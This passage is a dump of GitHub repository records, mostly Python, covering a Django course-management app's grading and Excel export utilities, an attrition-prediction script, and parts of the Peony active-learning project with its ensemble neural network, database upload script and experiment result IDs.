nombre de directorio a fichero\n \"\"\"\n\nif __name__ == \"__main__\":\n objeto = KaraokeLocal()\n print(objeto)\n objeto.to_json(sys.argv[1])\n objeto.do_local()\n objeto.to_json(sys.argv[1], 'local.json')\n print(objeto)\n"
}
] | 1 |
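
karaoke.py above relies on a smallsmilhandler module that is not included in this dump. Judging from the calls it makes (setContentHandler, and get_tags returning a list of dicts keyed by 'name' plus per-tag attributes), a compatible SAX handler would look roughly like the following inferred sketch; it is not the repository's actual code, and the tag/attribute map is assumed from typical SMIL content:

from xml.sax.handler import ContentHandler

class SmallSMILHandler(ContentHandler):

    def __init__(self):
        self.tags = []
        # Assumed SMIL tags and the attributes worth collecting
        self.attrs = {'root-layout': ['width', 'height', 'background-color'],
                      'region': ['id', 'top', 'bottom', 'left', 'right'],
                      'img': ['src', 'region', 'begin', 'dur'],
                      'audio': ['src', 'begin', 'dur'],
                      'textstream': ['src', 'region']}

    def startElement(self, name, attrs):
        # Store one dict per recognized tag, defaulting missing attributes to ''
        if name in self.attrs:
            tag = {'name': name}
            for att in self.attrs[name]:
                tag[att] = attrs.get(att, '')
            self.tags.append(tag)

    def get_tags(self):
        return self.tags
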
JellyWong/Uranus
|
https://github.com/JellyWong/Uranus
|
794b265b5e684f233409ac7240261e82abbfaf01
|
afbdae12f986099e65c84b50fdae4f999c68b91f
|
2d6fdbd9f4a1e9414ef3be4d0f65e0389c3fcc10
|
refs/heads/master
| 2021-01-21T14:52:26.823656 | 2017-07-03T16:35:56 | 2017-07-03T16:35:56 | 95,346,172 | 0 | 0 | null | 2017-06-25T07:54:26 | 2017-06-25T04:26:44 | 2017-06-25T07:34:58 | null |
[
{
"alpha_fraction": 0.6272673010826111,
"alphanum_fraction": 0.6369343996047974,
"avg_line_length": 31.898361206054688,
"blob_id": "5171ff5d0909c6ed8985f300e4d818e5b74480f7",
"content_id": "209452fd4f416be61b37e0ed4f69d6ed29b83174",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 10586,
"license_type": "no_license",
"max_line_length": 106,
"num_lines": 305,
"path": "/app/teacher/utils.py",
"repo_name": "JellyWong/Uranus",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# define your utility function here\nimport os\nfrom datetime import datetime\nfrom openpyxl import *\nfrom app.models import *\nfrom django.shortcuts import get_object_or_404\nfrom app.utils import *\nfrom app.utils.logUtils import *\nfrom app.teacher.entities import *\nfrom django.core.exceptions import *\n\n\ndef handle_uploaded_file(request,course_id,f):\n teacher=get_object_or_404(User,username=request.user.username)\n file=File(course_id=course_id,time=datetime.now(),file=f,user=teacher)\n file.save()\n\n\ndef import_student_for_course(request):\n course_id = request.POST.get('course_id', None)\n f = request.FILES['file']\n name = f.name\n if isXls(name):\n path = os.path.join(UPLOAD_ROOT, name)\n with open(path, 'wb+') as destination:\n for chunk in f.chunks():\n destination.write(chunk)\n wb = load_workbook(filename=path)\n sheet = wb.active\n ids = []\n for i in range(2, 10000):\n if sheet['A' + str(i)] is None:\n break\n else:\n ids.append(sheet['A' + str(i)])\n students_to_course(ids, course_id)\n os.remove(path)\n return 'import students for course success'\n else:\n return 'upload file must be a xls or xlsx excel'\n\n\ndef students_to_course(students_id, course_id):\n User.objects.filter(role='student', course_id=course_id).delete()\n course = Course.objects.get(id=course_id)\n for id in students_id:\n student = User.objects.get(username=id)\n enroll = Enroll(course=course, user=student)\n enroll.save()\n\n\ndef add_homework(homework_form, course_id, username,file):\n content = homework_form.cleaned_data['content']\n proportion = homework_form.cleaned_data['proportion']\n submits = homework_form.cleaned_data['submits']\n endTime = homework_form.cleaned_data['endTime']\n title=homework_form.cleaned_data['title']\n teacher = get_object_or_404(User, username=username)\n workmeta = WorkMeta(course_id=course_id, user=teacher, content=content,title=title,\n proportion=proportion, submits=submits, startTime=datetime.now(), endTime=endTime)\n workmeta.save()\n if file is not None:\n f=File(course_id=course_id,user=teacher,file=file,type='text',time=datetime.now())\n f.save()\n attachment = Attachment(file=f, workMeta=workmeta, type='workmeta')\n attachment.save()\n\n\n# 获取一个老师往期课程的所有作业\ndef get_past_homeworks(username):\n teacher = get_object_or_404(User, username=username)\n enrolls = Enroll.objects.filter(user__username=teacher.username)\n homeworks = []\n present = datetime.now()\n for enroll in enrolls:\n course = enroll.course\n if course.endTime.replace(tzinfo=None) <= present:\n workmetas = WorkMeta.objects.filter(course_id=course.id)\n homeworks.extend(workmetas)\n return homeworks\n\n#获取当前学期\ndef get_now_term():\n now_term = Term.objects.all().order_by('-id')[0]\n return now_term\n\n\n# 获取团队成绩表的完整路径名\ndef get_team_score_excel_file_abspath():\n now_term = get_now_term()\n\n # 第一次计算出各团队得分之后保存到excel表,以便老师下载\n # 各个团队得分的excel命名规范:termYear_termsemester_team_score_list.xlsx\n file_path = os.path.join(REPORT_ROOT, 'teamScores')\n if not os.path.exists(file_path):\n os.mkdir(file_path,)\n file_name = '' + str(now_term.year) + str(now_term.semester) + '_team_score_list.xlsx'\n file = os.path.join(file_path, file_name)\n return file\n\n\n# 获取学生成绩表的excel的完整路径名\ndef get_stu_score_excel_file_abspath():\n now_term = get_now_term()\n\n # 各人得分的excel命名规范:termYear_termsemester_stu_score_list.xlsx\n file_path = os.path.join(REPORT_ROOT, 'stuScores')\n if not os.path.exists(file_path):\n os.mkdir(file_path,)\n file_name = '' + str(now_term.year) + 
str(now_term.semester) + '_stu_score_list.xlsx'\n file = os.path.join(file_path, file_name)\n return file\n\n# 获取所有的团队学生表的excel的完整路径名\ndef get_team_members_all_excel_file_abspath():\n now_term = get_now_term()\n\n # 团队成员表的excel命名规范:termYear_termsemester_stu_teams.xlsx\n file_path = os.path.join(REPORT_ROOT, 'stuTeams')\n file_name = '' + str(now_term.year) + str(now_term.semester) + '_stu_teams.xlsx'\n file = os.path.join(file_path, file_name)\n return file\n\n# 保存所有的学生和团队信息到excel\ndef create_stu_teams_excel(file,course):\n work_book = Workbook()\n team_stu_list = reportTeams(course)\n ws = work_book.get_active_sheet()\n print(team_stu_list)\n\n ws.cell(row=1, column=1).value = '团队id'\n ws.cell(row=1, column=2).value = '团队名称'\n ws.cell(row=1, column=3).value = '队长'\n ws.cell(row=1,column=4).value = '队员'\n\n for i in range(0,len(team_stu_list)):\n num = i + 2\n ws.cell(row=num, column=1).value = team_stu_list[i]['id']\n ws.cell(row=num, column=2).value = team_stu_list[i]['name']\n ws.cell(row=num, column=3).value = team_stu_list[i]['leader'].user.name\n column_index = 4\n for member in team_stu_list[i]['member']:\n ws.cell(row=num, column=column_index).value = member.user.name\n column_index += 1\n work_book.save(filename=file)\n\n\n# 保存团队得分表到excel\ndef create_team_score_excel(file, team_list, score_list):\n work_book = Workbook()\n ws = work_book.get_active_sheet()\n ws.cell(row=1, column=1).value = '团队id'\n ws.cell(row=1, column=2).value = '团队名称'\n ws.cell(row=1, column=3).value = '分数'\n\n for i in range(0,len(team_list)):\n num = i+2;\n ws.cell(row=num, column=1).value = team_list[i].serialNum\n ws.cell(row=num, column=2).value = team_list[i].name\n ws.cell(row=num, column=3).value = score_list[i]\n work_book.save(filename=file)\n\n\ndef create_stu_score_excel(file, stu_list, stu_score_dict):\n work_book = Workbook()\n ws = work_book.get_active_sheet()\n ws.cell(row=1, column=1).value = '学号'\n ws.cell(row=1, column=2).value = '姓名'\n ws.cell(row=1, column=3).value = '分数'\n\n print(stu_list)\n print(stu_score_dict)\n num = 2\n for stu in stu_list:\n ws.cell(row=num, column=1).value = stu.username\n ws.cell(row=num, column=2).value = stu.name\n ws.cell(row=num, column=3).value = stu_score_dict[stu]\n num += 1\n work_book.save(filename=file)\n\n\n\n#计算团队得分\ndef compute_team_score():\n # now_term = get_now_term()\n team_list = get_team_list_in_now_course()\n score_list = []\n team_score = {}\n for team in team_list:\n work_list = Work.objects.filter(team=team)\n score = 0\n for work in work_list:\n score += (work.score or 0.0) * (work.workMeta.proportion or 0.0)\n team_score[team] = round(score,2)\n score_list.append(score)\n return team_list, score_list, team_score\n\n\n# 计算个人总得分 dict: key=team_member, value=score\ndef compute_stu_score():\n x, y, team_score = compute_team_score()\n stu_score = {}\n for team in team_score:\n team_member = Member.objects.filter(team=team)\n for member in team_member:\n score = (team_score[team] or 0.0) * (member.contribution or 0.0)\n stu_score[member.user] = round(score,2)\n return stu_score\n\n\n\n# 获取当前学期的所有team,并排序\ndef get_team_list_in_now_course():\n now_time = datetime.now()\n now_course = Course.objects.get(startTime__lt=now_time, endTime__gt=now_time)\n if now_course:\n team_list = Team.objects.filter(course=now_course).order_by('serialNum')\n return team_list\n\n\n# 获取当前学期所有参加的学生,并按学号排序\ndef get_stu_list_in_now_course():\n team_list = get_team_list_in_now_course()\n members_list = []\n for team in team_list:\n team_member = 
Member.objects.filter(team=team)\n members_list.extend(team_member)\n stu_list = []\n for member in members_list:\n stu_list.append(member.user)\n stu_list = sorted(stu_list, key=lambda x : x.username)\n return stu_list\n\n\n# 读取file文件\ndef file_iterator(file_name, chunk_size=512):\n with open(file_name, 'rb') as f:\n while True:\n c = f.read(chunk_size)\n if c:\n yield c\n else:\n break\n\n\n# 获取某一门课程中没有团队的学生\ndef query_unteamed_students(course_id):\n course=get_object_or_404(Course, id=course_id)\n enrolls=Enroll.objects.filter(course=course,user__role='student')\n unteamed_students=[]\n for enroll in enrolls:\n try:\n member=Member.objects.get(user=enroll.user)\n except:\n unteamed_students.append(enroll.user)\n return unteamed_students\n\n\n# 生成所有团队的所有成绩报表\ndef generate_team_scores(course_id):\n course=get_object_or_404(Course,id=course_id)\n workmetas=WorkMeta.objects.filter(course=course)\n teams=Team.objects.filter(course=course,status='passed')\n datas=[]\n for workmeta in workmetas:\n works=[]\n for team in teams:\n work=Work.objects.filter(workMeta=workmeta,team=team).order_by('-time').first()\n if work is None:\n work=Work(score=0,team=team)\n works.append(work)\n row_data=ScoreWrapper(workmeta=workmeta,works=works)\n datas.append(row_data)\n return datas\n\n\ndef generate_scores_excel(course_id):\n data=generate_team_scores(course_id)\n wb=Workbook()\n dest=os.path.join(REPORT_ROOT,'teams_scores_'+str(course_id)+'.xlsx')\n ws1=wb.active\n ws1.title='团队成绩报表'\n ws1['A1']='作业标题\\团队'\n ws1['A'+str(len(data)+3)]='加权总成绩'\n teams=Team.objects.filter(course_id=course_id,status='passed')\n\n for i in range(len(teams)):\n ws1.cell(row=1,column=i+2,value=teams[i].name)\n\n for i in range(len(data)):\n ws1.cell(row=i+2,column=1,value=data[i].workmeta.title)\n works=data[i].works\n for j in range(len(works)):\n ws1.cell(row=i+2,column=j+2,value=works[j].score)\n\n # 根据每次作业的权重,计算总成绩\n for i in range(len(teams)):\n sum=0\n for j in range(len(data)):\n weight=data[j].workmeta.proportion\n sum+=weight*data[j].works[i].score\n ws1.cell(row=len(data)+3,column=i+2,value=sum)\n wb.save(filename=dest)\n return dest\n"
},
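The `file_iterator` helper above is a plain chunked generator; the following is a minimal sketch of how such a generator is typically wired into a Django download view. The view itself is not part of the repository — its name and the attachment filename are hypothetical.

```python
# Hypothetical download view pairing file_iterator with Django's
# StreamingHttpResponse so large report files are streamed, not buffered.
from django.http import StreamingHttpResponse

def download_team_scores(request, course_id):
    path = generate_scores_excel(course_id)  # helper defined above; returns the xlsx path
    response = StreamingHttpResponse(file_iterator(path))
    response['Content-Type'] = 'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet'
    response['Content-Disposition'] = 'attachment; filename="teams_scores.xlsx"'
    return response
```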
{
"alpha_fraction": 0.6916578412055969,
"alphanum_fraction": 0.695881724357605,
"avg_line_length": 26.852941513061523,
"blob_id": "618fdb671b751d659585a94e2fa99cdb2bd661de",
"content_id": "7223eb893f3f347f0909b562b96d1baf9df13d6c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 971,
"license_type": "no_license",
"max_line_length": 99,
"num_lines": 34,
"path": "/app/utils/attendanceUtils.py",
"repo_name": "JellyWong/Uranus",
"src_encoding": "UTF-8",
"text": "from app.utils.logUtils import log, LOG_LEVEL\nfrom datetime import datetime\nfrom app.models import *\n\n# 关于签到的工具集\n# by kahsolt\n\n\ndef showToday():\n startTime = datetime(datetime.now().year, datetime.now().month, datetime.now().day, 9, 0, 0, 0)\n endTime = datetime.now()\n attendances = Attendance.objects.filter(time__range=(startTime, endTime)).order_by('time')\n return attendances\n\n\ndef showTimeBetween(startTime, endTime):\n if not isinstance(startTime, datetime) or not isinstance(endTime, datetime):\n return None\n\n attendances = Attendance.objects.filter(time__range=(startTime, endTime)).order_by('time')\n return attendances\n\n\ndef addAttendance(user):\n if not isinstance(user, User):\n return None\n if user.role != 'student':\n log('不是学生', 'attendanceUtils', LOG_LEVEL.ERROR)\n return False\n\n attendence = Attendance()\n attendence.user = user\n attendence.save()\n return attendence\n"
},
{
"alpha_fraction": 0.5625,
"alphanum_fraction": 0.5625,
"avg_line_length": 12,
"blob_id": "293cab1afbfdc7691db8317bc42ee64a5efd228b",
"content_id": "6e26057208d5ee0faa711a96f548ea08640dbb17",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 138,
"license_type": "no_license",
"max_line_length": 16,
"num_lines": 5,
"path": "/resource/uploads/README.txt",
"repo_name": "JellyWong/Uranus",
"src_encoding": "UTF-8",
"text": "[文件上传:作业附件/讲义资源]\n 导入学生/老师的xls\n 老师资料上传\n 学生作业上传\n 所有!!!"
}
] | 3 |
iamvinaysridhar/Data-Science-Process-Pipeline-using-Machine-Learning-Algorithms
|
https://github.com/iamvinaysridhar/Data-Science-Process-Pipeline-using-Machine-Learning-Algorithms
|
d172d6c57a48ebe53d6615b7ca9290985b2aa90c
|
a03bc5598053ba6bcba33df52537cb4ad16507d4
|
6ea7e74eaf9b5586c4557d8de3adfe0db4df0a11
|
refs/heads/main
| 2023-08-23T11:17:35.345758 | 2021-09-28T17:10:09 | 2021-09-28T17:10:09 | 411,370,553 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.6184696555137634,
"alphanum_fraction": 0.6205804944038391,
"avg_line_length": 23.18666648864746,
"blob_id": "5ade2842f396ad4de626c5c77067eadca050ffb3",
"content_id": "8d430740fa162f7bb2db3427386cb1c4549e288b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1895,
"license_type": "no_license",
"max_line_length": 55,
"num_lines": 75,
"path": "/Prediction.py",
"repo_name": "iamvinaysridhar/Data-Science-Process-Pipeline-using-Machine-Learning-Algorithms",
"src_encoding": "UTF-8",
"text": "if __name__ == \"__main__\":\r\n\r\n #Importing some libraries\r\n import numpy as np\r\n import pandas as pd\r\n import os\r\n #Getting rid of pesky warnings\r\n def warn(*args, **kwargs):\r\n pass\r\n import warnings\r\n warnings.warn = warn\r\n np.warnings.filterwarnings('ignore')\r\n\r\n column_names = [\r\n \t\"Age\",\r\n\t\t\"BusinessTravel\",\t\r\n\t\t\"Department\",\r\n\t\t\"DistanceFromHome\",\r\n\t\t\"Education\",\r\n\t\t\"EnvironmentSatisfaction\",\r\n\t\t\"Gender\",\r\n\t\t\"JobInvolvement\",\r\n\t\t\"JobLevel\",\r\n\t\t\"JobRole\",\r\n\t\t\"JobSatisfaction\",\r\n\t\t\"MaritalStatus\",\r\n\t\t\"MonthlyIncome\",\r\n\t\t\"NumCompaniesWorked\",\r\n\t\t\"OverTime\",\r\n\t\t\"PercentSalaryHike\",\r\n\t\t\"PerformanceRating\",\r\n\t\t\"StockOptionLevel\",\r\n\t\t\"TotalWorkingYears\",\r\n\t\t\"TrainingTimesLastYear\",\r\n\t\t\"WorkLifeBalance\",\r\n\t\t\"YearsAtCompany\",\r\n\t\t\"YearsInCurrentRole\",\r\n\t\t\"YearsSinceLastPromotion\",\r\n\t\t\"YearsWithCurrManager\"\r\n ]\r\n #Importing the dataset\r\n location = 'final.csv'\r\n dataset = pd.read_csv(location)\r\n dataset = dataset.drop(['Unnamed: 0'],axis=1)\r\n X=dataset.iloc[:,dataset.columns !='Attrition']\r\n Y=dataset.iloc[:,dataset.columns =='Attrition']\r\n \r\n #Feature scaling\r\n from sklearn.preprocessing import StandardScaler\r\n sc_X = StandardScaler()\r\n X_train = sc_X.fit_transform(X)\r\n \r\n\r\n #Using Pipeline\r\n import sklearn.pipeline\r\n \r\n from sklearn.ensemble import RandomForestClassifier\r\n from sklearn.decomposition import KernelPCA\r\n from imblearn.pipeline import make_pipeline\r\n \r\n \r\n clf = RandomForestClassifier()\r\n kernel = KernelPCA()\r\n \r\n pipeline = make_pipeline(kernel, clf)\r\n pipeline.fit(X,Y)\r\n\r\n #User-input\r\n v = []\r\n for i in column_names[:]:\r\n v.append(input(i+\": \"))\r\n answer = np.array(v)\r\n answer = answer.reshape(1,-1)\r\n answer = sc_X.transform(answer)\r\n print (\"Predicts:\"+ str(pipeline.predict(answer)))\r\n \r\n"
}
] | 1 |
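The prediction script above refits the scaler and pipeline from `final.csv` on every run before prompting for input. A common refinement, sketched below under the assumption that the artifact file names are free to choose, is to persist the fitted objects once with joblib and reload them in prediction-only runs:

```python
# Sketch only: persist the fitted objects from the script above (file names
# are illustrative), then reload them so prediction runs skip retraining.
import joblib

joblib.dump(sc_X, "scaler.joblib")        # fitted StandardScaler
joblib.dump(pipeline, "pipeline.joblib")  # fitted KernelPCA + RandomForest pipeline

# ... in a later prediction-only run:
sc_X = joblib.load("scaler.joblib")
pipeline = joblib.load("pipeline.joblib")
```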
sahanmar/Peony
|
https://github.com/sahanmar/Peony
|
72d1bbce082a22ffd71c701461c70e87d7955a34
|
8dbca13d5416bf44102eaf8948cee711a1ecc085
|
5ac272348c71081de92769b1eb868a11a5ef360a
|
refs/heads/master
| 2022-09-10T02:58:41.844681 | 2022-08-29T09:19:51 | 2022-08-29T09:19:51 | 175,298,146 | 3 | 0 | null | 2019-03-12T21:21:38 | 2022-05-01T10:36:21 | 2022-08-29T09:19:51 |
Jupyter Notebook
|
[
{
"alpha_fraction": 0.6510416865348816,
"alphanum_fraction": 0.6666666865348816,
"avg_line_length": 20.33333396911621,
"blob_id": "950ad2cbebc9deba15a9314b406a969e4ed64c73",
"content_id": "529f8e9a273ae87652a0a758a2f29157ae40c7d0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 192,
"license_type": "no_license",
"max_line_length": 45,
"num_lines": 9,
"path": "/Peony_project/Peony_database/src/datasets/common.py",
"repo_name": "sahanmar/Peony",
"src_encoding": "UTF-8",
"text": "import hashlib\n\nfrom typing import List, Any\n\n\ndef create_hash(hash_args: List[Any]) -> str:\n sha = hashlib.sha256()\n sha.update(\" \".join(hash_args).encode())\n return sha.hexdigest()\n"
},
{
"alpha_fraction": 0.5785398483276367,
"alphanum_fraction": 0.5829645991325378,
"avg_line_length": 33.769229888916016,
"blob_id": "16f7d4a49eadeb69453377484109f1b40b95b7fb",
"content_id": "f2e45f79cf29783a99093565d608e6233d04caa6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3616,
"license_type": "no_license",
"max_line_length": 110,
"num_lines": 104,
"path": "/Peony_project/Peony_box/src/peony_adjusted_models/feed_forward_nn.py",
"repo_name": "sahanmar/Peony",
"src_encoding": "UTF-8",
"text": "import numpy as np\nimport torch\nimport torch.nn as nn\n\nfrom sklearn.preprocessing import OneHotEncoder\nfrom typing import Optional, Tuple, List\nfrom torch.utils.data import DataLoader\n\n\nfrom Peony_box.src.peony_adjusted_models.neural_nets_architecture import (\n NeuralNet,\n NeuralNetLSTM,\n)\n\n\nNUM_ENSEMBLES = 10\nEPOCHS = 2000\n# Device configuration\nDEVICE = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\nLEARNING_RATE = 0.001\n\nneural_network = NeuralNet\n\n\nclass PeonyFeedForwardNN:\n def __init__(\n self, hidden_size: int, num_classes: int, rand_sample_ratio: int, num_ensembles: int = NUM_ENSEMBLES\n ):\n\n self.num_ensembles = num_ensembles\n\n self.model: Optional[List[NeuralNet]] = None\n self.criterion: Optional[List[nn.CrossEntropyLoss]] = None\n self.optimizer: Optional[List[torch.optim.SGD]] = None\n\n self.hidden_size = hidden_size\n self.num_classes = num_classes\n self.num_epochs = EPOCHS\n self.initialized = False\n self.rand_sample_ratio = rand_sample_ratio\n\n def fit(self, data: DataLoader, features_size: int) -> Optional[List[str]]:\n\n loss_list: List[str] = []\n\n if self.initialized is False:\n self.model = [\n neural_network(features_size, self.hidden_size, self.num_classes).to(DEVICE)\n for i in range(self.num_ensembles)\n ]\n self.criterion = [nn.CrossEntropyLoss() for i in range(self.num_ensembles)]\n self.optimizer = [\n # torch.optim.SGD(\n # self.model[i].parameters(), lr=LEARNING_RATE, momentum=0.9\n # )\n torch.optim.Adam(self.model[i].parameters(), lr=LEARNING_RATE)\n for i in range(self.num_ensembles)\n ]\n self.initialized = True\n\n initial_loss_per_ensemble: List[float] = []\n fitted_loss_per_ensemble: List[float] = []\n for index in range(self.num_ensembles):\n for epoch in range(self.num_epochs):\n\n for instances, labels in data:\n\n # Forward pass\n self.optimizer[index].zero_grad()\n outputs = self.model[index].train()(instances)\n loss = self.criterion[index](outputs, labels)\n # Backward and optimize\n loss.backward()\n self.optimizer[index].step()\n\n if epoch == 0:\n initial_loss_per_ensemble.append(loss.detach().numpy())\n fitted_loss_per_ensemble.append(loss.detach().numpy())\n loss_list.append(f\"starting loss (ensembles mean) is {np.mean(initial_loss_per_ensemble)}\")\n loss_list.append(f\"fitted loss (ensembles mean) is {np.mean(fitted_loss_per_ensemble)}\")\n\n if self.initialized:\n self.num_epochs = 20\n\n return loss_list\n\n def predict(self, data: DataLoader) -> np.ndarray:\n predicted_list = []\n for index in range(self.num_ensembles):\n with torch.no_grad():\n predicted_list.append(\n np.concatenate(\n [self.model[index].predict(instances).data.detach().numpy() for instances, _ in data],\n axis=0,\n )\n )\n return predicted_list\n\n def reset(self) -> None:\n self.initialized = False\n self.num_epochs = EPOCHS\n for index in range(self.num_ensembles):\n self.model[index].hidden.reset_parameters()\n self.model[index].output.reset_parameters()\n"
},
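`predict` above returns one probability array per ensemble member. For reference, here is a short sketch (not from the repository) of how such a list is typically reduced to the entropy and BALD acquisition scores that the experiment names in this project refer to; it assumes each element has shape `(n_samples, n_classes)` with rows summing to one:

```python
# Illustrative reduction of ensemble outputs to uncertainty scores.
import numpy as np

def entropy(p: np.ndarray, eps: float = 1e-12) -> np.ndarray:
    # Shannon entropy over the last (class) axis
    return -np.sum(p * np.log(p + eps), axis=-1)

def acquisition_scores(ensemble_probs):
    probs = np.stack(ensemble_probs)                 # (n_ensembles, n_samples, n_classes)
    mean_p = probs.mean(axis=0)                      # marginal predictive distribution
    predictive_entropy = entropy(mean_p)             # total uncertainty
    expected_entropy = entropy(probs).mean(axis=0)   # average per-member uncertainty
    bald = predictive_entropy - expected_entropy     # mutual information (epistemic part)
    return predictive_entropy, bald
```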
{
"alpha_fraction": 0.7901408672332764,
"alphanum_fraction": 0.8077464699745178,
"avg_line_length": 60.69565200805664,
"blob_id": "cb6d135ca49929806bf34c4053880e2441b874b5",
"content_id": "eadce5f7a85e0bd26842d04b907f7a90135aef79",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 1421,
"license_type": "no_license",
"max_line_length": 241,
"num_lines": 23,
"path": "/Peony_project/README.md",
"repo_name": "sahanmar/Peony",
"src_encoding": "UTF-8",
"text": "# Peony Project Architecture\n\n## Database\n\n\n\nIn order to make everything consistent and let the models work with the same input format we decided to create a database that will store all the data in JSON format for the purposes of machine learning and visualizing components. \n\n[Peony Database Architecture](https://github.com/sahanmar/Peony/blob/peony_project_documentation/Peony_project/peony_database/README.md)\n\n## PeonyBox\n\n\n\nPeonyBox is a name for a machine learning component of the project. It takes an input from a database, processes it, and then saves an output to the database. In PeonyBox it will be possible train, test and save the models for further usage.\n\n## Visualization\n\n\n\nVisualization is third part component of this project that takes the data from the database (which were previously uploaded there from PeonyBox) and gives statistics and curves that help to measure quality of models.\n\n[Peony Visualization Component](https://github.com/sahanmar/Peony/tree/peony_project_documentation/Peony_project/Peony_visualization)\n\n"
},
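As a usage illustration of the flow the README describes, the following sketch uses only the `PeonyPackage.PeonyDb.MongoDb` calls that appear elsewhere in this dump (`load_data_to_database`, `get_model_results`); the commented arguments and the empty query filter are illustrative:

```python
# Round trip through the Peony database: upload a dataset, read results back.
from pathlib import Path
from PeonyPackage.PeonyDb import MongoDb

api = MongoDb()
# 1) Upload a dataset with its loader/transformer pair, as the upload scripts do:
# api.load_data_to_database(COLLECTION_NAME, Path("data/"), load_data, transorm_data)
# 2) Later, the visualization component reads stored model results back:
for result in api.get_model_results({}):
    print(result)
```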
{
"alpha_fraction": 0.6899619102478027,
"alphanum_fraction": 0.6899619102478027,
"avg_line_length": 21.485713958740234,
"blob_id": "7fbce13e60933157e3ff1c2c3b5c61b8d73f099b",
"content_id": "0d8bf7805e31d30c5b2fe26182b51fabee85eeee",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 787,
"license_type": "no_license",
"max_line_length": 80,
"num_lines": 35,
"path": "/Peony_project/Peony_database/src/pretrained_models/upload_pretrained_models_2_mongo.py",
"repo_name": "sahanmar/Peony",
"src_encoding": "UTF-8",
"text": "import argparse\n\nfrom pathlib import Path\nfrom PeonyPackage.PeonyDb import MongoDb\n\n# Imports for datasets upload\nfrom embeddings.fasttext_embeddings import (\n COLLECTION_NAME as fasttext_collection_name,\n transorm_data as fasttext_transformer,\n load_data as fasttext_loader,\n)\n\n# args for different datasets\ndef input_args() -> argparse.ArgumentParser:\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--fasttext\", help=\"Path to fasttext pretarained model\")\n return parser\n\n\n# upload to mongo\ndef main():\n args = input_args().parse_args()\n\n api = MongoDb()\n\n api.load_data_to_database(\n fasttext_collection_name,\n Path(args.fasttext),\n fasttext_loader,\n fasttext_transformer,\n )\n\n\nif __name__ == \"__main__\":\n main()\n"
},
{
"alpha_fraction": 0.48064759373664856,
"alphanum_fraction": 0.6814382672309875,
"avg_line_length": 91.5435562133789,
"blob_id": "2e4691142d71c94da07b15e7ac605ff8217cb05a",
"content_id": "85cac47a230ed58c676c7140a938281d3c18f66d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 26560,
"license_type": "no_license",
"max_line_length": 110,
"num_lines": 287,
"path": "/Peony_project/Peony_visualization/src/batch_active_learning_article/result_ids.py",
"repo_name": "sahanmar/Peony",
"src_encoding": "UTF-8",
"text": "DATA = [\n [\"6244a5af0ab887b10a47dee1\", \"Tweet_emotion_detection\", \"nn_100_step_10_iters\", \"min_margin\"],\n [\"6244ba9b0ab887b10a47dee2\", \"Tweet_emotion_detection\", \"mc_dropout_100_step_10_iters\", \"hac_entropy\"],\n [\"6244cf050ab887b10a47dee3\", \"Tweet_emotion_detection\", \"mc_dropout_100_step_10_iters\", \"hac_bald\"],\n [\"6244df1c0ab887b10a47dee5\", \"Tweet_emotion_detection\", \"mc_dropout_100_step_10_iters\", \"entropy\"],\n [\"6244e70e0ab887b10a47dee6\", \"Tweet_emotion_detection\", \"mc_dropout_100_step_10_iters\", \"bald\"],\n [\"6244d6fb0ab887b10a47dee4\", \"Tweet_emotion_detection\", \"mc_dropout_100_step_10_iters\", \"random\"],\n [\"625abd55651a5be997ecbca3\", \"Tweet_emotion_detection\", \"nn_100_step_10_iters_warm_start\", \"hac_entropy\"],\n [\"625ad5dc651a5be997ecbca4\", \"Tweet_emotion_detection\", \"nn_100_step_10_iters_warm_start\", \"hac_bald\"],\n [\"625ae75f651a5be997ecbca6\", \"Tweet_emotion_detection\", \"nn_100_step_10_iters_warm_start\", \"entropy\"],\n [\"625af024651a5be997ecbca7\", \"Tweet_emotion_detection\", \"nn_100_step_10_iters_warm_start\", \"bald\"],\n [\"625adeb8651a5be997ecbca5\", \"Tweet_emotion_detection\", \"nn_100_step_10_iters_warm_start\", \"random\"],\n [\"6244d26e4b505e4d973c3070\", \"Tweet_emotion_detection\", \"nn_50_step_20_iters\", \"min_margin\"],\n [\"6244f4574b505e4d973c3071\", \"Tweet_emotion_detection\", \"mc_dropout_50_step_20_iters\", \"hac_entropy\"],\n [\"624511024b505e4d973c3072\", \"Tweet_emotion_detection\", \"mc_dropout_50_step_20_iters\", \"hac_bald\"],\n [\"6245285c4b505e4d973c3074\", \"Tweet_emotion_detection\", \"mc_dropout_50_step_20_iters\", \"entropy\"],\n [\"624534234b505e4d973c3075\", \"Tweet_emotion_detection\", \"mc_dropout_50_step_20_iters\", \"bald\"],\n [\"62451cb64b505e4d973c3073\", \"Tweet_emotion_detection\", \"mc_dropout_50_step_20_iters\", \"random\"],\n [\"625aced50d3655e467156f45\", \"Tweet_emotion_detection\", \"nn_50_step_20_iters_warm_start\", \"hac_entropy\"],\n [\"625af81a0d3655e467156f46\", \"Tweet_emotion_detection\", \"nn_50_step_20_iters_warm_start\", \"hac_bald\"],\n [\"625b15b80d3655e467156f48\", \"Tweet_emotion_detection\", \"nn_50_step_20_iters_warm_start\", \"entropy\"],\n [\"625b24800d3655e467156f49\", \"Tweet_emotion_detection\", \"nn_50_step_20_iters_warm_start\", \"bald\"],\n [\"625b06c50d3655e467156f47\", \"Tweet_emotion_detection\", \"nn_50_step_20_iters_warm_start\", \"random\"],\n [\"62453ad28716941057c12d2d\", \"Tweet_emotion_detection\", \"nn_20_step_50_iters\", \"min_margin\"],\n [\"62457aca8716941057c12d2e\", \"Tweet_emotion_detection\", \"mc_dropout_20_step_50_iters\", \"hac_entropy\"],\n [\"6245bbde8716941057c12d2f\", \"Tweet_emotion_detection\", 